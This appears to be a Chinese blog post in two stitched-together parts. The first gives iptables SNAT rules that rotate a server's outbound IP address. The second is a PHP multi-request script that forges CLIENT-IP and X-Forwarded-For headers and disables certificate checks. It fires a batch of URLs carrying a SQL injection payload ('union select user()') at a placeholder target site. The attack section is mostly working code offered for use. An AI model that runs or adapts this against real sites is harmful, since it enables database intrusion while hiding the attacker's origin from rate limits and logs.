方案:iptables的nth模块
more
service firewalld status
(disabled 表明 已经禁止开启启动 enable 表示开机自启,inactive 表示防火墙关闭状态 activated(running)表示为开启状态)
安装iptables防火墙及操作:
yum install iptables-services
常用命令如下:
systemctl start iptables #启动
systemctl status iptables #查看运行状态
systemctl restart iptables.service #重启
systemctl stop iptables.service #停止
systemctl enable iptables.service #设置开机启动
systemctl disable iptables.service #禁止开机启动
iptables -F -t nat #清空nat规则 也就是下面的多IP设置的规则里面
curl icanhazip.com
多执行几次看看是不是同一个
/sbin/iptables -t nat -I POSTROUTING -m state --state NEW -p tcp -m multiport --dports 80,443 -o eth0 -m statistic --mode nth --every 1 --packet 0 -j SNAT --to-source 122.52.62.33
#解释上面命令意思:
--dports 80,443意思80和443 意思请求别人的这些端口就循环IP
-o eth0 这个是你网卡 出口网卡哦
--every 1 这个数字1是代表第一条IP 如果你输入多次就每次数字叠加
--to-source 122.52.62.33 你多个IP其中一个IP
列如我现在添加第二条
/sbin/iptables -t nat -I POSTROUTING -m state --state NEW -p tcp -m multiport --dports 80,443 -o eth0 -m statistic --mode nth --every 2 --packet 0 -j SNAT --to-source 122.52.62.34
service iptables save
(好了 你可以尝试curl icanhazip.com看看 每次IP都不一样了,注意哦 防火墙需要启动哦)
]]><?php
function curl_multi($urls,$referer)
{
if (!is_array($urls) or count($urls) == 0) {
return false;
}
$num = count($urls);
$curl = $curl2 = $text = array();
$handle = curl_multi_init();
function createCh($url,$referer)
{
if($referer==""){
$referer=$url;
}
$xforip = rand(1, 254) . "." . rand(1, 254) . "." . rand(1, 254) . "." . rand(1, 254);
$header = array("Connection: Keep-Alive", "Accept: application/json, text/javascript, */*; q=0.01", "Pragma: no-cache", "Accept-Language: zh-Hans-CN,zh-Hans;q=0.8,en-US;q=0.5,en;q=0.3", "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36", 'CLIENT-IP:' . $xforip, 'X-FORWARDED-FOR:' . $xforip,'x-real-ip:'.$xforip); // 请求头信息
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
// curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Linux; U; Android 4.4.1; zh-cn; R815T Build/JOP40D) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/4.5 Mobile Safari/533.1');
//设置头部
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
curl_setopt($ch, CURLOPT_REFERER, $referer); //设置来源
curl_setopt($ch, CURLOPT_ENCODING, "gzip"); // 编码压缩
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); //是否采集301、302之后的页面
curl_setopt($ch, CURLOPT_MAXREDIRS, 5); //查找次数,防止查找太深
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // 对认证证书来源的检查
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); // 从证书中检查SSL加密算法是否存在
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_HEADER, 0); //输出头部
return $ch;
}
//准备分配线程
foreach ($urls as $k => $v) {
$url = $urls[$k];
$curl[$k] = createCh($url,$referer);
//向curl批处理会话中添加单独的curl句柄
curl_multi_add_handle($handle, $curl[$k]);
}
$active = null;
do {
//运行当前 cURL 句柄的子连接
$mrc = curl_multi_exec($handle, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
while ($active && $mrc == CURLM_OK) {
//等待所有cURL批处理中的活动连接
if (curl_multi_select($handle) != -1) {
usleep(100);
}
do {
//运行当前 cURL 句柄的子连接
$mrc = curl_multi_exec($handle, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
}
foreach ($curl as $k => $v) {
if (curl_error($curl[$k]) == "") {
//如果没有报错则将获取到的字符串添加到数组中
$text[$k] = (string) curl_multi_getcontent($curl[$k]);
}
//移除并关闭curl该句柄资源
curl_multi_remove_handle($handle, $curl[$k]);
curl_close($curl[$k]);
}
//关闭cURL句柄
curl_multi_close($handle);
//将数组返回
return $text;
}
/**
* 请求html页面源码接口数据方法
* @param string $url 请求地址
* @param int 访问方式 1:post 0:get 默认 get方式
* @param string 上传文件
* @param string cookie文件
* @param bool 请求头
* @return string 数据
*/
function getHtml($url, $ifpost = 0, $datafields = '', $cookiefile = '', $v = false)
{
// 伪造IP
$xforip = rand(1, 254) . "." . rand(1, 254) . "." . rand(1, 254) . "." . rand(1, 254);
$header = array("Connection: Keep-Alive", "Accept: application/json, text/javascript, */*; q=0.01", "Pragma: no-cache", "Accept-Language: zh-Hans-CN,zh-Hans;q=0.8,en-US;q=0.5,en;q=0.3", "User-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14", 'CLIENT-IP:' . $xforip, 'X-FORWARDED-FOR:' . $xforip); // 请求头信息
$ch = curl_init();
// 使用伪造代理IP
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, $v);
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
$ifpost && curl_setopt($ch, CURLOPT_POST, $ifpost);
$ifpost && curl_setopt($ch, CURLOPT_POSTFIELDS, $datafields);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
$cookiefile && curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiefile);
$cookiefile && curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiefile);
$r = curl_exec($ch);
curl_close($ch);
return $r;
}
$arr=[
'https://www.你的域名/?id=1%27union%20select%20user(),1,3--',
'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--',
'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--',
'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--',
'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--',
'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--',
'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--',
'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--',
'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--',
'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--',
'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--',
'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--',
'https://www.需要测试的网址.com/?id=1%27union%20select%20user(),1,3--',
'https://www.需要测试的网址.com/index.html?wzip='
];
$res=curl_multi($arr,"https://www.需要测试的网址.com");//测试的网址数组和来路 具体自己改良哈
var_dump($res);
//echo getHtml("http://www.需要测试的网址.com/uyeeweww");
]]>